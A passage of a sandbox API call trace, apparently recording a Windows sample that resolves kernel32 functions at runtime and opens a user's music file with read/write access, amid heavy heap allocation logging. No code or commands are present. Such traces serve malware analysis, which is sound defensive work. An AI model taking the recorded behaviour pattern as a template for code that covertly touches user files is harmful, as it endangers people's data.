out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.356] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ceb0 [0038.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ceb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.357] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0038.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ceb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.357] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0038.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab260 [0038.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", cchWideChar=58, lpMultiByteStr=0x7ab260, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a", lpUsedDefaultChar=0x0) returned 58 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.358] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\s65zb6ggvh2opwafb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0038.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=58, lpWideCharStr=0x7800d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\s65Zb6gGvH2opWaFb.m4a") returned 58 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.360] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.362] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.362] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.363] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.364] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0038.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.364] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.364] CloseHandle (hObject=0x140) returned 1 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.365] 